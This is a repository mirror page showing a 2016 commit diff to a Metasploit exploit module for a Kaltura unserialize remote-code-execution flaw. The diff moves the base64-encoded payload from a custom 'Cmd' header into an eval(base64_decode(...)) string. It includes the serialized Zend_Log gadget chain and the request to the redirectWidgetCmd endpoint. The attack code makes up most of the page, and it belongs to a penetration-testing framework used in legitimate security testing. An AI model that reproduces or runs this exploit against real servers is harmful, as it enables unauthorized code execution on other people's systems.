infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Send payload with POST rather than custom header.

bug/bundler_fix
Mehmet Ince 2016-09-17 23:11:16 +03:00
parent ba6c2117cf
commit 53d4162e7d
1 changed files with 1 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
modules/exploits/unix/webapp/kaltura_unserialize_rce.rb
View File

@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
cmd = "print_r(eval(base64_decode($_SERVER[HTTP_CMD]))).die()" cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
p = "" p = ""
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";" p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
@ -99,9 +99,6 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi( res = send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'), 'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
'headers' => {
'Cmd' => Rex::Text.encode_base64(payload.encode)
},
'vars_get' => { 'vars_get' => {
'kdata' => Rex::Text.encode_base64(p) 'kdata' => Rex::Text.encode_base64(p)
} }